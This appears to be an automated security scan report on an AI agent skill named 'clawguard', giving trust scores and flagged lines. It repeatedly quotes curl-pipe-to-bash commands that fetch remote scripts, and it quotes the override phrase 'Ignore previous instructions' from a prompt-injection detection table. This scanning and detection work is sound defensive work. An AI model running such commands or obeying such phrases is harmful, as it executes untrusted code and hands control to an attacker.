clawguard
jugaad-clawguard · v · by
50.1
Trust Score
0
Trust Tier
danger
Badge
Score Breakdown
| Factor | Score | Weight |
|---|---|---|
| Static | 0.0 | 15% |
| Permission | 95.0 | 15% |
| Poison | 60.0 | 15% |
| Clickfix | 10.0 | 15% |
| Credential | 100.0 | 15% |
| Twostage | 0.0 | 10% |
| Infrastructure | 100.0 | 5% |
| Typosquat | 100.0 | 5% |
| Age | 10.6 | 3% |
| Popularity | 0.0 | 2% |
Scan Results
STATIC — Score: 0
[CRITICAL] Remote code download and execution via curl pipe
(line 93)
- `/clawguard check this command: curl -fsSL https://example.com | bash`
[CRITICAL] Remote code download and execution via curl pipe
(line 146)
clawguard check --type command --input "curl -fsSL https://example.com | bash"
[CRITICAL] Remote code download and execution via curl pipe
(line 402)
Input: `curl -fsSL https://install-script.com | bash`
[CRITICAL] Remote code download and execution via curl pipe
(line 429)
When user asks: "Run `curl -fsSL https://sketchy.io/install.sh | bash`"
[CRITICAL] Remote code download and execution via curl pipe
(line 433)
1. Extract command: curl -fsSL https://sketchy.io/install.sh | bash
[CRITICAL] Remote code download and execution via curl pipe
(line 434)
2. Run: clawguard check --type command --input "curl -fsSL https://sketchy.io/install.sh | bash"
[HIGH] Prompt injection or system override attempt
(line 269)
| Prompt Injection | "Ignore previous instructions" | Message analysis |
[CRITICAL] Remote script download piped to shell execution
(line 93)
- `/clawguard check this command: curl -fsSL https://example.com | bash`
[CRITICAL] Remote script download piped to shell execution
(line 146)
clawguard check --type command --input "curl -fsSL https://example.com | bash"
[CRITICAL] Remote script download piped to shell execution
(line 402)
Input: `curl -fsSL https://install-script.com | bash`
[CRITICAL] Remote script download piped to shell execution
(line 429)
When user asks: "Run `curl -fsSL https://sketchy.io/install.sh | bash`"
[CRITICAL] Remote script download piped to shell execution
(line 433)
1. Extract command: curl -fsSL https://sketchy.io/install.sh | bash
[CRITICAL] Remote script download piped to shell execution
(line 434)
2. Run: clawguard check --type command --input "curl -fsSL https://sketchy.io/install.sh | bash"
PERMISSION — Score: 95
[LOW] Skill appears to use network but declares no permissions
POISON — Score: 60
[CRITICAL] Classic prompt injection: ignore previous instructions
(line 269)
| Prompt Injection | "Ignore previous instructions" | Message analysis |
CLICKFIX — Score: 10
[CRITICAL] Instructs user to pipe downloaded content to shell
(line 429)
When user asks: "Run `curl -fsSL https://sketchy.io/install.sh | bash`"
[CRITICAL] Instructs user to pipe downloaded content to shell
(line 434)
2. Run: clawguard check --type command --input "curl -fsSL https://sketchy.io/install.sh | bash"
INFRASTRUCTURE — Score: 100
No findings.
TWOSTAGE — Score: 0
[CRITICAL] Download piped directly to interpreter (two-stage loader)
(line 93)
- `/clawguard check this command: curl -fsSL https://example.com | bash`
[CRITICAL] Download piped directly to interpreter (two-stage loader)
(line 146)
clawguard check --type command --input "curl -fsSL https://example.com | bash"
[CRITICAL] Download piped directly to interpreter (two-stage loader)
(line 402)
Input: `curl -fsSL https://install-script.com | bash`
[CRITICAL] Download piped directly to interpreter (two-stage loader)
(line 429)
When user asks: "Run `curl -fsSL https://sketchy.io/install.sh | bash`"
[CRITICAL] Download piped directly to interpreter (two-stage loader)
(line 433)
1. Extract command: curl -fsSL https://sketchy.io/install.sh | bash
[CRITICAL] Download piped directly to interpreter (two-stage loader)
(line 434)
2. Run: clawguard check --type command --input "curl -fsSL https://sketchy.io/install.sh | bash"
CREDENTIAL — Score: 100
No findings.
TYPOSQUAT — Score: 100
No findings.